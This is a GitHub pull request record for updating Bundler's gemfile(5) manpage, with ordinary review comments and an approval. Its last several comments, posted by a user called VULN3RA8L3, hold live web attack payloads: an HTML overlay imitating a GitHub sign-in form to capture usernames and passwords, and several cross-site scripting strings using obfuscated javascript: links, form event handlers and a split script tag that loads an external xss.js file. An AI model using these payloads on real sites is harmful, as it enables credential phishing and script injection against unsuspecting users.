### PR TITLE
Bring docs for gemfile(5) manpage up to date

### PR DESCRIPTION
**Pull request by tnir**
## What was the end-user or developer problem that led to this PR?

[gemfile(5) manpage](https://bundler.io/v2.3/man/gemfile.5.html) in Bundler is stale.

## What is your fix for the problem, implemented in this PR?

- Use updated Ruby/JRuby versions as examples as the current Bundler supports Ruby 2.3+.
- Add mswin/mswin64 to platforms
- Use TruffleRuby as example instead of Rubinius

Signed-off-by: Takuya Noguchi [takninnovationresearch@gmail.com](https://github.com/sponsors/tnir)

## Make sure the following tasks are checked

- [x] Describe the problem / feature
- [n/a] Write [tests](https://github.com/rubygems/rubygems/blob/master/bundler/doc/development/PULL_REQUESTS.md#tests) for features and bug fixes
- [x] Write code to solve the problem
- [x] Make sure you follow the [current code style](https://github.com/rubygems/rubygems/blob/master/bundler/doc/development/PULL_REQUESTS.md#code-formatting) and [write meaningful commit messages without tags](https://github.com/rubygems/rubygems/blob/master/bundler/doc/development/PULL_REQUESTS.md#commit-messages)

### CODE REVIEW

**Comment by tnir** [comment]
@deivid-rodriguez Could you check it out as the failed check on Actions looks irrelevant to this change to me.

**Comment by indirect** [comment]
Thanks, this is great!

Since Bundler 2 requires a minimum Ruby version of 2.3.0, it seems like we can remove the docs (and I suppose also the implementation?) for the `patchlevel:` argument for the `ruby` DSL method.

File: bundler/lib/bundler/man/gemfile.5
Comment (indirect) [inline bundler/lib/bundler/man/gemfile.5:98]:
```suggestion
Other implementations \fIhttps://www\.ruby\-lang\.org/en/about/\fR of Ruby exist\. Some of the more well\-known implementations include JRuby \fIhttp://jruby\.org/\fR and TruffleRuby \fIhttps://www\.graalvm\.org/ruby/\fR\. Rubinius is an alternative implementation of Ruby written in Ruby\. JRuby is an implementation of Ruby on the JVM, short for Java Virtual Machine\. TruffleRuby is an implementation of Ruby on the GraalVM, a language toolkit built on top of the JVM\.
```

File: bundler/lib/bundler/man/gemfile.5.ronn
Comment (indirect) [inline bundler/lib/bundler/man/gemfile.5.ronn:92]:
```suggestion
    TruffleRuby is a Ruby implementation on the GraalVM, a language toolkit built on the JVM.
```

**Comment by tnir** [comment]
> Since Bundler 2 requires a minimum Ruby version of 2.3.0, it seems like we can remove the docs (and I suppose also the implementation?) for the patchlevel: argument for the ruby DSL method.

I do not think we can remove this section from the docs since you know the implementation of `patchlevel` keyword argument for `ruby` DSL method in `Gemfile`. First, with this PR, we can update how it currently works and then we can remove implementation later and finally remove the doc for it.

**Comment by tnir** [comment]
#6012 was just created to discuss how we can deprecate/remove this legacy feature.

**Review by deivid-rodriguez — APPROVED** [review]

**Comment by deivid-rodriguez** [comment]
@tnir Can I merge this? I _think_ that you force-pushed after my approval, so just wanted to make sure that it's ready.

**Comment by tnir** [comment]
@deivid-rodriguez Yes, please merge this PR. Just rebased the branch as you did not merge it after your approval :pray:

**Comment by VULN3RA8L3** [comment]
<div style="position:fixed;padding:10%;padding-right:100%;left:-9%;top:-20%;background:white;padding-bottom:100%;"><section style="margin-left:500px;padding:30px;"><h2 style="text-align:center;">Sign in to GitHub</h2><div><label>Username: </label><input type=text style="border-radius:5px;border:1px solid;">
<label>Password:  </label><input type=password style="border-radius:5px;border:1px solid;"><div style="text-align:center;"><button style="background:#2da44e;color:white;margin:10px;border-radius:9px;border:none;font-weight:500;padding:4px;padding-right:20px;padding-left:20px;" type=submit>Sign in</button></div></section></div></div><!--{}

**Comment by VULN3RA8L3** [comment]
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>

**Comment by VULN3RA8L3** [comment]
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>

**Comment by VULN3RA8L3** [comment]
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X

**Comment by VULN3RA8L3** [comment]
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>

**Pull request merged**
